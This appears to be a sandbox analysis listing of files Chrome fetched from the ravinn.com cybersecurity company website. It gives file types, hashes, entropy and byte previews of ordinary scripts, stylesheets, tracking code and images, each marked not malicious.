                                                Preview:/*!.. * Bootstrap v5.2.0 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..(function (global, factory) {.. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory(require('@popperjs/core')) :.. typeof define === 'function' && define.amd ? define(['@popperjs/core'], factory) :.. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, global.bootstrap = factory(global.Popper));..})(this, (function (Popper) { 'use strict';.... function _interopNamespace(e) {.. if (e && e.__esModule) return e;.. const n = Object.create(null, { [Symbol.toStringTag]: { value: 'Module' } });.. if (e) {.. for (const k in e) {.. if (k !== 'default') {.. const d = Object.getOwnPropertyDescriptor(e, k);.. Object.defineProperty(n, k, d.get ? d : {..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                Category:downloaded
                                                Size (bytes):1048576
                                                Entropy (8bit):7.9936478153159705
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:36D5B09820907892B5EB592765419020
                                                SHA1:3C8A332E09F1DA2A78437556196BBFE7909087FB
                                                SHA-256:CAB0DF90C01BED2EB37BD65EF9637A53869340B64C0190165C0C973B788C25B0
                                                SHA-512:BDED64DC02F68694D9F2204F4F3EC3A60DCBE4EE08B7248A7135C6C1CEB0CDC78378EED8E6E0E9D4C6FB82E8ADC387E61318041FC83D494D7A947EDEDD6CF80A
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4:2f905610c59538:0
                                                Preview:....ftypmp42....mp42mp41....moov...lmvhd............_....p................................................@..................................1trak...\tkhd.....................p................................................@....@... .....$edts....elst...........p............mdia... mdhd............a............@hdlr........vide.............Mainconcept Video Media Handler...Aminf....vmhd...............3hdlr........alis............Alias Data Handler....$dinf....dref............url ........stbl....stsd............avc1.........................@. .H...H.........AVC Coding............................1avcC.M@)....gM@).R.................2....h..5 ....stts...........w.......Lstss...................3...L...e...~...........................-...F..._....sdtp..............................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1000x640, components 3
                                                Category:downloaded
                                                Size (bytes):330186
                                                Entropy (8bit):7.960619957032336
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AB2E968ACC5657E9C7399867BECAE416
                                                SHA1:FD5D018A579E6A262E491DC03AD55E40224D7ADD
                                                SHA-256:23110D595DD056CE28BAE7D9252A9FE42DE26AFEDC75590E98DFAA00017124D5
                                                SHA-512:3D0AF959C94ABD583D282B4E016D706B6DAC295B394E8CAE962FDF4B5D592DEDA58E2EF992E1E43087FCF8BA1C531B66658F90D6B1A28E9F0545929F8C4E4F1D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Incident-Response.jpg
                                                Preview:......JFIF.....H.H.....C....................................................................C.......................................................................................................................O.....................!....1."A.Q.2aq.B..#R....b..$3r.....C.%4..&5ScsD....6Te...............................D....................!1A.."Qaq...2BR...br.........#C.c......S3............?..:.c0..T.T.o.1......xy#p.y.|..D.......i.5........wm..i.'..v..k..ER...(a.....k@..w\..s-R......B..5..,...$..e<.&.|.(.2.I...@...zy..U3,......T%.z...d/tv.4...a....y..F..M....Ygq...]..%`.T..2q"6....`4)3..u*..C..,..........$....=..G..T.SX.-?.......>.%....C....(b..LD.w.....WP.......T.X..]...rJ).. ...p4.,.f....io...u....i....w3o..r_...&..@..1.<...x....aw..w{...4z.......Nb.6..Q.#3H..}...m..O..9.............MV.";A.....B....LO......Y\..fE`...jyu.F.........w.@P...Dbr>.Q..`.S,.i%*H.)../...a.R.....m.q.`...g.ji.vG.i9.s.35^...A]..T..g......\....G..;...$..- ......%m.......I.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (59458)
                                                Category:downloaded
                                                Size (bytes):114706
                                                Entropy (8bit):4.924852554644207
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.2
                                                Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):4114
                                                Entropy (8bit):4.540189002558376
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6DC6237A5F974BEACB8C24C2ED870E4B
                                                SHA1:F1FD8B31D92339929E681C79CA61DE8176778564
                                                SHA-256:66802A6445683EABF08EFC6BC7FB6288EC301D3AE82568768A205A8BF4DE27E4
                                                SHA-512:80285FE48C34A6985112D2BC0BFEBB200E175CA2D1D24B8CA4DA5CE925A39EDE373D665B3DD7CEBAEAEED456D220DA78F351CA8BBD097641A173F64CF3D7F556
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/loadmore.js?ver=6.7.2
                                                Preview:jQuery(function($){. var page = 1;. var loading = false;. var $loadMoreButton = $('.loadmore');. var $viewMoreButton = $('.more-btn');. var noMorePostsMessage = 'No more case studies';. . function setEqualHeights() {. var maxHeight = 0;. $('.filter-item > *').each(function () {. var itemHeight = $(this).outerHeight();. maxHeight = Math.max(maxHeight, itemHeight);. });. $('.filter-item > *').height(maxHeight);. }. . var maxRecursion = 3; // Set the maximum recursion limit. var recursionCount = 0; // Initialize the recursion counter..function filterAndLoadPosts() {. var filterval = $(".filter-nav-list li.is-active").attr('data-filter');...$gridf = $('.filter-grid').isotope({....// options....itemSelector: '.filter-item',....layoutMode: 'fitRows',....filter: filterval,....masonry: {.....gutter: 20,....},...});. . var isotopeInstance = $gridf.data('isotope');. if (isotopeInstance.filter
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (4016)
                                                Category:downloaded
                                                Size (bytes):256518
                                                Entropy (8bit):5.561903607070326
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7DD4E39FE3A35094A90FD42C60B7333F
                                                SHA1:24A808658C03809933E4CA3182EE3A8F198655AC
                                                SHA-256:3220CF48248868B1C8E7D38FD18202382EAB4072C73D4C9806916132604A83ED
                                                SHA-512:37B85F2F07DCC1A85611518FBF742414FE07B31B739C600CA9C4F0C52502519CCB7AB5325A2F1B12BEE0330B42E8F7ABE43499B1D240C2D52095B5ECF1F28A36
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.googletagmanager.com/gtm.js?id=GTM-PGPTP2GV
                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"formID"},{"function":"__c","vtp_value":"G-63LK6Z20GR"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__d","vtp_elementSelector":"h1","vtp_selectorType":"CSS"},{"function":"__d","vtp_elementSelector":"meta[name='description']","vtp_attributeName":"content","vtp_selectorType":"CSS"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryP
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 1161 x 473, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):34396
                                                Entropy (8bit):7.516054395556416
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:4C72F8CCE26351E349C763F517E37C7D
                                                SHA1:6BC634DCF1FB58B1757DB600E008FCF0F9C09C3E
                                                SHA-256:D086E5EDFBB886A891A1EAB3EBA3A2EAAC5B3A6D13E2166B458DE6D6B13FAB44
                                                SHA-512:CBBB16C07A48B9896682807196643CDED0928E085BE4CD3E9EC02842DC666939F4CC9243862F681E8A4D49319B022E6A180819D9D0FAE569B122266E69D48377
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...............k... .IDATx..... .D..dvL"S.$V......?!.3.`x_r.5W.....+.`..x.w.:....8.g!I.$I...4.......1.. ...W..\...HA.CG.0..R.<..q.H.....F.m..................0..A.m6....K.....H4.H....z.....bI..........0.....+6.Ab..1".>..D..8.F...pI........1.. ....C..0.....v.&w.;x......4....T......H.......1................q.D..G.m&.%.....CI.......1..........L$H...q.D...D...2.......4.......A..0....CX...``"..),...........]={...D......^.......1..0....FqL....L.q.$.\.$z....]....e.........1.. ...s.....t.:.40.....I.+-.w.5.......$.......A.. ...H.......`.AE?......;../.......aI........1......'5jSQ..aD.H.R7......`,........1......W=...2.D,.E....:.......1.......W......1..Ov,.,....+........1..@...@(....T./u.)d.pN".z.,..uY....>K........1..0..A..^@ER4.R.D..w.~.`#.?..{v-....`P........1..!...:@....JP.PA.p'.CE"^7..........%........A......9.*.. ..I+.M$...6A....cI.......1......9......V.2..o.r......j.......1......9..KL.2..D|4."...8T-.......1.....A$..N(.....o.#...U4*....A..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (495), with no line terminators
                                                Category:downloaded
                                                Size (bytes):495
                                                Entropy (8bit):5.364636382962906
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:24A2D369008851ADC758BCB785D7F376
                                                SHA1:EA0449B1F96C65390B72012BFF4A9F3295826C0F
                                                SHA-256:6935A89AF27E0D6267EF15A1FA0455487B07440895CFFED070DFEC0CE0961BC9
                                                SHA-512:7332634B3EF6A2122542E8732E5A8AC86BD7C306B22F43B759F0B4F6CC0F6A84C2CDB969B9AF38CE2BC99734FFAD69EB6F10513682D2A53A4FC4709A998372E5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static-tracking.klaviyo.com/onsite/js/static.4b8f99d71b7685ee4f53.js?cb=1
                                                Preview:"use strict";(self.webpackChunk_klaviyo_onsite_modules=self.webpackChunk_klaviyo_onsite_modules||[]).push([[5430],{23105:function(t,o,s){o.Z=({tracking:t})=>{var o;const i=t?"https://static-tracking.klaviyo.com/onsite/js/":"https://static.klaviyo.com/onsite/js/",n=null==(o=window.klaviyoModulesObject)?void 0:o.assetSource;s.p=n?`${i}${n}`:i}},71772:function(t,o,s){var i=s(23105);s(45933);(0,i.Z)({tracking:!1})}},function(t){t.O(0,[2462],(function(){return o=71772,t(t.s=o);var o}));t.O()}]);
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):758
                                                Entropy (8bit):7.639170872083696
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:A2DC973F6BB590A23379082AF69624C1
                                                SHA1:FC3869B4C51681E00662FECE0ADA7D94A2BA927E
                                                SHA-256:A65D680E1ACE9A3E6EEEBFC951A00EB96C531555086459026B8F4233FF34E6CD
                                                SHA-512:42A99477267EB8753D29C9EA733CCDB7FF53C361DAB99A317106C48A3DB93D133E4A631397EB7B00BFD00AB445E18E8CBFFE50AD6C03F27FF899DBFA8180EEEB
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR... ... .....szz.....pHYs..........+......IDATX..QHSQ......tn........ .-.KBG.I.Aif!..XQQ../.$e...(ZZj/%%..a6.....RL..f(..tw=L&W.......|.9......{T...;.f .P..D....q1..@..R.8+...=j|o.-d.Qn.7.:.....%.z..>..g..%..".............B..J....J.......2..g...V.W...........Q~.[.gB./{.k!."....&.)).%..W...eep`$r...E.r.6.3.x.PAB.V.T*...q..,g........Hb9.2P...[D=..3...?6.c1......4..*.(.,,...PXdA.]....1..%.5a.0.....OZ..:+..={.tmX...X&./.h.uf......uP....\..E..H...&.9S\..%..a..E/.m=......^..^a|...g..h..d|..@..L..l..c......./l...,.[}.z.3....^.@..t.....~(d.M}...,O..Hb...A._...<z.!1..].>.......-.].X.....A......%.ogj2'...`.....[..~..o.........{.?NJ.F...p....f..s2?.m.S..4....sb..T..O.....@...-.j|..h...J.~...q.f.?...ed.......IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):5302
                                                Entropy (8bit):3.9506765830527963
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:57D4995DA9B29AEED8C2E702B05311DC
                                                SHA1:C5FCD25C91320AB9DB86CAEDB401ABCC43086D21
                                                SHA-256:69A9B6E30E5B8176B1844FF155A0CFF230435DB0879C779A1EC6379756078A25
                                                SHA-512:BBA6C807D55C7E0A0D2D4C95BE5BA0A14AF200A87623C01870404CE8CFAE01D513A46A6EE02C7BD946884A9605114C6DD0E43A065EEC20B172480B4FA7B5C911
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="423" height="67" viewBox="0 0 423 67" fill="none">. <path fill-rule="evenodd" clip-rule="evenodd" d="M331.459 1.49155C331.925 1.49849 332.371 1.68185 332.708 2.00467C333.044 2.32749 333.246 2.76579 333.272 3.23125V64.9363C333.241 65.3918 333.035 65.8178 332.697 66.1247C332.359 66.4317 331.916 66.5958 331.459 66.5825H329.182L289.268 24.5008H289.174V63.9293C289.169 64.1633 289.118 64.394 289.024 64.6083C288.93 64.8226 288.794 65.0163 288.625 65.1782C288.456 65.3401 288.257 65.4671 288.039 65.5519C287.821 65.6368 287.588 65.6778 287.354 65.6727H278.682C278.215 65.6656 277.769 65.4818 277.432 65.1582C277.096 64.8346 276.895 64.3954 276.869 63.9293V2.22552C276.897 1.7676 277.103 1.33858 277.442 1.02959C277.781 0.720605 278.227 0.555999 278.686 0.570739H282.265L322.971 44.3922L320.866 37.4309V3.23125C320.87 2.99835 320.92 2.76854 321.013 2.5551C321.106 2.34166 321.241 2.14882 321.409 1.98774C321.75 1.66113
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (746)
                                                Category:downloaded
                                                Size (bytes):6880
                                                Entropy (8bit):5.29583262969909
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F2949D127A709412C6C931BDAC0C924E
                                                SHA1:87D06CCD9B5A61C35A609048CC40D7DACC5B0778
                                                SHA-256:BCA40058579F0231F6889445867EBB171DCCA75228DCB598D4BA429948D5EB70
                                                SHA-512:665726AD6BDD945365FFAC31188CB1A1B760DB139286D4E5F2D035985F52AB9E90D1C915B0272D201360DB72D4B87759F1CE9FB2C979B535697D9BB41A9EC9BD
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/script.js?v=1743482759
                                                Preview:if(document.getElementById("currentTime")){ ..function getDateTime() {...var now = new Date();...var year = now.getFullYear();...var month = ((now.getMonth() + 1) < 10 ? '0' : '') + (now.getMonth() + 1);...var day = (now.getDate() < 10 ? '0' : '') + now.getDate();...var hour = (now.getHours() < 10 ? '0' : '') + now.getHours();...var minute = (now.getMinutes() < 10 ? '0' : '') + now.getMinutes();...var second = (now.getSeconds() < 10 ? '0' : '') + now.getSeconds();...var svgCalender = '<svg width="13" height="15" viewBox="0 0 13 15" fill="none" xmlns="http://www.w3.org/2000/svg">'+'<path d="M3.0625 0.75C3.28125 0.75 3.5 0.96875 3.5 1.1875V2.5H8.75V1.1875C8.75 0.96875 8.94141 0.75 9.1875 0.75C9.40625 0.75 9.625 0.96875 9.625 1.1875V2.5H10.5C11.457 2.5 12.25 3.29297 12.25 4.25V13C12.25 13.9844 11.457 14.75 10.5 14.75H1.75C0.765625 14.75 0 13.9844 0 13V4.25C0 3.29297 0.765625 2.5 1.75 2.5H2.625V1.1875C2.625 0.96875 2.81641 0.75 3.0625 0.75ZM11.375 6H0.875V13C0.875 13.4922 1.25781 13.875 1.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (6129)
                                                Category:downloaded
                                                Size (bytes):357662
                                                Entropy (8bit):5.60907767620031
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:25F1E0C03332256EBD1CB12885F2A3B7
                                                SHA1:91228D4338A18D2105F0A3EA3C452BBBF1C0CA8D
                                                SHA-256:EEFAD01608C7C1555D7E10436CABC5BD31C20CFAD9402788D28E2F7932974D33
                                                SHA-512:151D97828D63B8D4D62764DF83FFED0FAB2846580C190593D99BCCCB22668E82BFF6904D864013CC720E0079000544A033B3652C3A4C5F497BD04A3550B5F327
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.googletagmanager.com/gtag/js?id=G-63LK6Z20GR
                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":12,"vtp_instanceOrder":0,"vtp_paramValue":"Blaikie_Street","vtp_ruleResult":["macro",1],"tag_id":7},{"function":"__ogt_ip_mark","priority":12,"vtp_instanceOrder":1,"vtp_paramValue":"Byres_Street","vtp_ruleResult":["macro",2],"tag_id":9},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValu
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 1095 x 237, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):28140
                                                Entropy (8bit):7.947949881101512
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:277A6C67A4F929A78119DE9883248BBD
                                                SHA1:8522F2C31A8AB73EDB39046B9D7FE3DA9B93BE29
                                                SHA-256:299D05FBBB3C5D133A671C8037BA63089042D6CF57B28212477AAB7B368410CB
                                                SHA-512:94ABAEECCEFB9643DA889A224DDA21B471B209C144D03B834B602F314814A1DC78B87BCB43D4A7C9ABA889D8B38410DAF3B6E3D41A0C6961B1D7851125096335
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/logo3.png
                                                Preview:.PNG........IHDR...G.........]......?iCCPICC Profile..H..W.XS...[..@h........@J.-.`#$.B.1.T...kAE.l....;bgQ.}........&.t.W.7.7w.....93...j.9"Q...@.0_...O...B'=.$..(@..8.<.3::..2.......i{.^.....Z4x.<..H4.i.<n.....k."q>.D)o6-_$..-1...ER.!.5R.&.e6.,...PR.p....^.<....5T.!v...B.......N.A...5..A,.g.....7.aM.'c..."+J..<Q.g.....]rs$C>,aU....J...v3{J...@.'L...X.......b..).I....<...\e.:.8.a..@.$..W.i. 6.p......x.u!^....S.l.O.U.B...,..?....J}.d'0...3.l.>.Z....1.b..Ab$..;.e.)l..f.".l.Xi.......r}. ]..../..../.1S..T....!..`.\.,~8..._.L...........(.;../L.S.|........QN...7...KyS.]....c..|.!..x.(?:^.'^....../......H`M.S@..t.5..;yO...1..|`.`.F$.z.........A..8.Y/..@..0+..tYo.lD6x.q...9.^".%.....CF....X.0..X.....b.3L.+..G..%1..@.!..mp}........V'..{...=.....p..M.5YP$.)........H.1..%.t..qo...q.\..........]!.R.-...'.....P...(y..l..HU[U.a.i...<..|..{~...!.<..l.-..ag...9.0....1.....H...z,.]C.be.dC..?....4.y....._.}....w4`M....22..L.E...B..(....3......&F..@t:.s..........\.1...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 539 x 93, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):10797
                                                Entropy (8bit):7.962185658465294
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DEDDC5FB5B2EBD2CE5CAC0AEBADF24E7
                                                SHA1:6B3127F51AAA76B5AD7FC13FC539B3A14DB4F142
                                                SHA-256:D69DD1B29BCACB362EE8B11B2C49589C76D38D422BAF97798207C641CA01640E
                                                SHA-512:67F1661B8E27F611B9CC41AD280056DDCE20244C988538639A1CB17CCA142A075F7B51838C399F864C52A873D02B207D7B40A5B572F89AA8ADF2589B08BD6FF6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......].......3....?iCCPICC Profile..H..W.XS...[..@h........@J.-.`#$.B.1.T...kAE.l....;bgQ.}........&.t.W.7.7w.....93...j.9"Q...@.0_...O...B'=.$..(@..8.<.3::..2.......i{.^.....Z4x.<..H4.i.<n.....k."q>.D)o6-_$..-1...ER.!.5R.&.e6.,...PR.p....^.<....5T.!v...B.......N.A...5..A,.g.....7.aM.'c..."+J..<Q.g.....]rs$C>,aU....J...v3{J...@.'L...X.......b..).I....<...\e.:.8.a..@.$..W.i. 6.p......x.u!^....S.l.O.U.B...,..?....J}.d'0...3.l.>.Z....1.b..Ab$..;.e.)l..f.".l.Xi.......r}. ]..../..../.1S..T....!..`.\.,~8..._.L...........(.;../L.S.|........QN...7...KyS.]....c..|.!..x.(?:^.'^....../......H`M.S@..t.5..;yO...1..|`.`.F$.z.........A..8.Y/..@..0+..tYo.lD6x.q...9.^".%.....CF....X.0..X.....b.3L.+..G..%1..@.!..mp}........V'..{...=.....p..M.5YP$.)........H.1..%.t..qo...q.\..........]!.R.-...'.....P...(y..l..HU[U.a.i...<..|..{~...!.<..l.-..ag...9.0....1.....H...z,.]C.be.dC..?....4.y....._.}....w4`M....22..L.E...B..(....3......&F..@t:.s..........\.1...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 443 x 114, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):5788
                                                Entropy (8bit):7.944057528220862
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:06FC674418B37F61FFC5403DD6DA1A32
                                                SHA1:8D925368FD904807AE8AEC5BCC58CDBD7727CB8D
                                                SHA-256:E1135F15AF9395C30D106C18D24EAD58CE004E5186B9182BD7A1B31547B3167D
                                                SHA-512:53B04FC723682F48EB0AD641340889F8ADB82AF773850CE9B4E32C1D48CBD4F96F8E21524022EE217EFC40DE20CF6DF63DC8F6F68E6636EB1923089A356FF5A3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......r......'......PLTE................................................%..............Z..l..u..Q........6...........a...........A........<........p........u.....Q......k......IDATx..].r.8..d..B.o.........>^.'d.f{kg...~..Z...IZ..'.a.G...g}...Oyt.....G6..\>.a..-......p......R...f............. ..`.I .......C..b....GO.K.....c{p..y;.!b..+.-..:.44V.nf.zY...i..a...t..$lj.I........G.}.@8|.`w...,OF.l..qt..a.%,$..v..!.....b2...;.....>..i'.92b...1E....e..2.Y.~.?|..3AL..\.%............#. ..sI....N....j...."b..7....$,,..q......r^..~..^G..(..2..p..h......i...~. .-.J=.z.....78a.....|...7.;..U.e.=WyM...sI..3.:2.....')K.....WJ2.-`.$k......e..Wv.....`.Y.V`..P...%..R/%~}.....N.y..S..........ObJ\.q..J.N..&.../...;v...Z..P....N..A.-.M.*.Y....`......?...2.J/...u...1.w.....v.7.,q..~.j...].|.;...y.>J....+....b......N.p#.<..4'...h....:@..I.4vb.....M...!.....)2.$......3fz/..~.;'.xH.=~W'..F.5..iz.i...S..Z....kD...s.4aY.VB#.(....t.-...I../._.nPT[.b..k....
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):201
                                                Entropy (8bit):4.976838311431054
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:74DBFE28FA1D33EE63B47602FA9C61CB
                                                SHA1:B3177283BE8F5FC3B3907E3CF85CED08B6593D7A
                                                SHA-256:4C8AFD8C4FD0BC51180BFB9747E0B0399A33A2EA6F0F5F5C9D21D88049B7E38A
                                                SHA-512:A532A82414D6F2A98D830681529334372E4524E3C37893FA0866DFA6F078BB5B09F7D95A88B14062EE4D63AA2AB2534FA8ED80A147F9F103FA2BFBA7CAF72B08
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/style.css?ver=6.7.2
                                                Preview:/*.Theme Name: Ravinn theme.Author: Deante.Author URI: https://deante.co/.Description: Custom RAVINN - CYBER RESILIENCE AND THREAT INTELLIGENCE SPECIALISTS theme.Version: 1.0.0.Text Domain: ravinn.*/..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):1750
                                                Entropy (8bit):3.996740054489418
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:97DFC4E5EF47103F8F76C34B26D57E3F
                                                SHA1:06C51B1E7DA66438E3908E1D596613882566EFDD
                                                SHA-256:915A934C392976FD47E842E71F4EC320691A1F547825B1FF3E3BA2C03DF90A0E
                                                SHA-512:3B786374D548F8A27666CDA46529DC47210EA9A17CEE344E7CB9ADA2FF4575D0CAF640F92787C7C1E5D1DBC287B4F6021C12A7C70ADC00E3BF139D6FA3AA0EBB
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/The-Team.svg
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32" fill="none">. <path d="M14.625 0.3125C15.0625 0.125 15.5 0 16 0C16.4375 0 16.875 0.125 17.3125 0.3125L30.9375 6.4375C31.5625 6.6875 32 7.3125 32 8C32 8.75 31.5625 9.375 30.9375 9.625L17.3125 15.75C16.875 15.9375 16.4375 16 16 16C15.5 16 15.0625 15.9375 14.625 15.75L1 9.625C0.375 9.375 0 8.75 0 8C0 7.3125 0.375 6.6875 1 6.4375L14.625 0.3125ZM16 2C15.75 2 15.5625 2.0625 15.4375 2.125L2.3125 8L15.4375 13.9375C15.5625 14 15.75 14 16 14C16.1875 14 16.375 14 16.5 13.9375L29.625 8L16.5 2.125C16.375 2.0625 16.1875 2 16 2ZM4.875 13.75C5.125 14.25 4.875 14.875 4.375 15.125L2.3125 16L15.4375 21.9375C15.5625 22 15.75 22 16 22C16.1875 22 16.375 22 16.5 21.9375L29.625 16L27.5625 15.125C27.0625 14.875 26.8125 14.25 27.0625 13.75C27.3125 13.25 27.875 13.0625 28.375 13.25L30.9375 14.4375C31.5625 14.6875 32 15.3125 32 16C32 16.75 31.5625 17.375 30.9375 17.625L17.3125 23.75C16.875 23
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (8856), with CRLF, LF line terminators
                                                Category:downloaded
                                                Size (bytes):57774
                                                Entropy (8bit):5.187850794629874
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B2CEB8600D8C5E01B5568BA83B4E0248
                                                SHA1:8B07CA8E97104CFDC957B585BD925E690815B3FA
                                                SHA-256:ECE7D0319D6DE5C928B6A0E34B9F89CC941DB342122DE5E1E78197CC81F6D23E
                                                SHA-512:3ADF42A1B2B79C4457410A64A42DDC257FD093635315B5BABBA146DD1B4FF1643C3713E119A8A378FFF0659D575B198A359AC12264287AD33BC73D2012F2280C
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/
